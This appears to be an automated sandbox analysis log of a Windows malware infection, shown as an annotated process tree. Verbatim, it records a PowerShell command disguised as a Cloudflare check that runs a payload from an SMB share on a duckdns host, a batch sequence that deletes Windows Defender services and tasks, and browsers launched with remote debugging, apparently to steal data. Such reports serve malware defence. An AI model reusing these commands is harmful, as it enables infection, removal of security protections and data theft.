C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5584
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\net.exenet use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!9⤵
- System Location Discovery: System Language Discovery
PID:3408
-
-
\??\UNC\aaso12.duckdns.org\shear\s.exe\\aaso12.duckdns.org\shear\s -fullinstall9⤵
- Sets service image path in registry
- Drops file in Program Files directory
PID:1396
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\272.exe"C:\Users\Admin\AppData\Local\Temp\272.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE2C.tmp\BE2D.tmp\BE2E.bat C:\Users\Admin\AppData\Local\Temp\272.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\272.exe"C:\Users\Admin\AppData\Local\Temp\272.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3524 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BFE1.tmp\BFE2.tmp\BFE3.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"10⤵
- Drops file in Program Files directory
PID:2944 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:4556
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4592
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:4452
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:1472
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:592
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3928
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:544
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:5692
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:5720
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2064
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:412
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:1916
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:864
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:4740
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:5608
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:4128
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:4960
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:932
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:324
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:4700
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:3840
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:5092
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:5236
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:5108
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:2668
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:5072
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:2948
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4544
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4532
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:2232
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:4636
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:2208
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:1988
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4404
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:4272
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:4568
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:5304
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:3000
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:5680
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:6064
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:5424
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:4908
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:3844
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:1736
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:4940
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:5812
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:5800
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:1936
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:5788
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:2936
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:3416
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:512
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:6096
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:1156
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:5568
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:4952
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:5848
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:2840
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2056
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:3284
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10451760101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10451760101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6140 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3672 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6032 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4892 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd5247dcf8,0x7ffd5247dd04,0x7ffd5247dd1011⤵PID:3968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1960 /prefetch:211⤵PID:2768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2240,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2244 /prefetch:311⤵PID:2832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2560 /prefetch:811⤵PID:3128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3256 /prefetch:111⤵
- Uses browser remote debugging
PID:1552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3292 /prefetch:111⤵
- Uses browser remote debugging
PID:652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4036,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4100 /prefetch:211⤵
- Uses browser remote debugging
PID:5456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4692 /prefetch:111⤵
- Uses browser remote debugging
PID:1980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5180,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5192 /prefetch:811⤵PID:4960
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5768 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x21c,0x7ffd5a51f208,0x7ffd5a51f214,0x7ffd5a51f22011⤵PID:3052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1780,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:311⤵PID:1920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2028,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=2024 /prefetch:211⤵PID:1508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2532,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:811⤵PID:2736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3448,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:111⤵
- Uses browser remote debugging
PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:111⤵
- Uses browser remote debugging
PID:1652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5388,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:811⤵PID:5832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5404,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:811⤵PID:1564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5832,i,8504107133955145536,17905294650934920070,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:811⤵PID:5812
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
PID:3076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2372 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffd5a51f208,0x7ffd5a51f214,0x7ffd5a51f22011⤵PID:2236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=2528 /prefetch:311⤵PID:4592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2500,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=2492 /prefetch:211⤵PID:2832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2136,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=2808 /prefetch:811⤵PID:3128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3496,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:111⤵
- Uses browser remote debugging
PID:2668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3500,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:111⤵
- Uses browser remote debugging
PID:1716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4116,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=5116 /prefetch:811⤵PID:5272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4840,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:811⤵PID:1080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5484,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=5492 /prefetch:811⤵PID:1224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4204,i,3974105501104375449,10604412946354196170,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:811⤵PID:5588
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
PID:6412 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2b8,0x7ffd5a51f208,0x7ffd5a51f214,0x7ffd5a51f22011⤵PID:5560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:311⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2148,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:211⤵PID:6808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=2536 /prefetch:811⤵PID:1180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3464,i,2391294570805351121,11839459589128454801,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:111⤵
- Uses browser remote debugging
PID:6616
-
-
